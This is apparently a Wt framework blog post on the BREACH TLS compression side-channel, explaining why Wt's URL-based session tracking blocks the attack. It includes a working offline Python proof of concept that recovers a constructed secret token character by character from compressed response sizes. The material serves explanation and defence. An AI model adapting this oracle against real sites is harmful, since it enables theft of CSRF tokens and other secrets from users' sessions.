Security: Wt and the new BREACH vulnerability

A new vulnerability, BREACH, was presented last Thursday at the Black Hat security conference in Las Vegas.

The vulnerability is significant because it undermines what SSL/TLS is supposed to provide for a web application. It does not break the encryption itself: it uses the size of HTTP-compressed (gzip/deflate) responses as a side channel. When a page contains a secret and also reflects attacker-controlled input, the length of the encrypted response reveals whether the input matches part of the secret, and the attacker can recover the secret one character at a time.

The paper provides more details, and shows for example how the attack recovers the CSRF token that web applications embed in pages to protect against CSRF attacks. The attack has the same precondition as CSRF itself: the attacker must be able to make the victim's browser issue many requests that the server treats as authenticated, and that works because the browser attaches the session cookie to every request. Since Wt never relies (solely) on cookies for session tracking, an attacker cannot make a victim's browser produce authenticated responses without knowing the session ID in the URL. A Wt application is therefore, luckily, not vulnerable to BREACH, neither for a CSRF token nor for any other secret in the application's pages.
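To make the mechanism concrete, here is an added example that reproduces the compression oracle offline with Python's zlib. It is not code from the Wt project or from the BREACH paper. A constructed page reflects a query parameter and also contains a secret token; the attacker recovers the token one character at a time by comparing response sizes. The page text, the secret, the `token=` marker, the use of static Huffman coding and the padding sweep that defeats byte alignment are all assumptions of this example.

```python
"""Compression side channel behind BREACH, reproduced offline with zlib.

Constructed scenario (added example, not from the Wt post or the BREACH paper):
an HTTPS page reflects a query parameter and also carries a secret token. The
attacker can make the victim's browser fetch the page with a chosen reflected
value and can observe the length of the compressed-then-encrypted response.
"""
import zlib

SECRET_TOKEN = "a7f3c9e2"        # constructed secret; unknown to the attacker
ALPHABET = "0123456789abcdef"    # token character set the attacker assumes
MARKER = "token="                # text that precedes the secret in the page


def render_page(reflected: bytes) -> bytes:
    """Constructed HTML: attacker-controlled text first, then the secret."""
    return (b"<html><body><p>Query: " + reflected + b"</p>"
            + b'<a href="/logout?' + MARKER.encode() + SECRET_TOKEN.encode()
            + b'">log out</a></body></html>')


def compressed_size(reflected: bytes) -> int:
    """What a network attacker measures: the compressed response length in bytes.

    Z_FIXED (static Huffman table) keeps the demonstration deterministic. Real
    servers use dynamic Huffman codes, whose noise the BREACH paper handles with
    its 'Two Tries' technique and repeated measurements.
    """
    z = zlib.compressobj(6, zlib.DEFLATED, 15, 8, zlib.Z_FIXED)
    return len(z.compress(render_page(reflected)) + z.flush())


def bit_cost(reflected: bytes) -> int:
    """Byte lengths round away sub-byte differences: extending an LZ77 match by
    one byte saves the 8-bit literal but can cost an extra bit in the length
    code, and a 7-bit saving may not change the byte count. Summing the sizes
    of eight requests padded with 0..7 distinct bytes >= 0x90 (9-bit literals
    in the static table) moves the byte boundary through every position, so a
    saving of a few bits always shows in the sum. Assumption of this example."""
    return sum(compressed_size(reflected + bytes(range(0x90, 0x90 + k)))
               for k in range(8))


def recover_token(length: int) -> str:
    """Recover the token one character at a time: the guess that extends the
    known prefix correctly lets LZ77 match one more byte of the secret, so its
    response compresses better than the fifteen wrong guesses."""
    known = ""
    for _ in range(length):
        known += min(ALPHABET,
                     key=lambda c: bit_cost((MARKER + known + c).encode()))
    return known


if __name__ == "__main__":
    right = compressed_size((MARKER + SECRET_TOKEN[0]).encode())
    wrong = compressed_size((MARKER + "0").encode())
    print(f"first character: right guess {right} bytes, wrong guess {wrong} bytes")
    print("recovered token:", recover_token(len(SECRET_TOKEN)))
```

Every measurement stands for one request that the victim's browser would have to make with the attacker's chosen value, and the server only includes the secret in the response when the request is authenticated. That is the step a Wt application denies the attacker: without the session ID in the URL there is no authenticated response to measure. In this constructed page the plain byte length can already tie at the fifth character, where the match length grows from 10 to 11 and the deflate length code gains a bit, which is why the recovery uses the padding sweep.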

Note that even if you configure session-tracking to Auto (which we do not recommend), where Wt does set a cookie holding the session ID, the cookie alone never identifies the session: every subsequent Ajax request must still carry the session ID in the URL, which mitigates any CSRF attack. The cookie serves only to keep the session across a browser refresh, and Wt does not interpret user data from such a page refresh.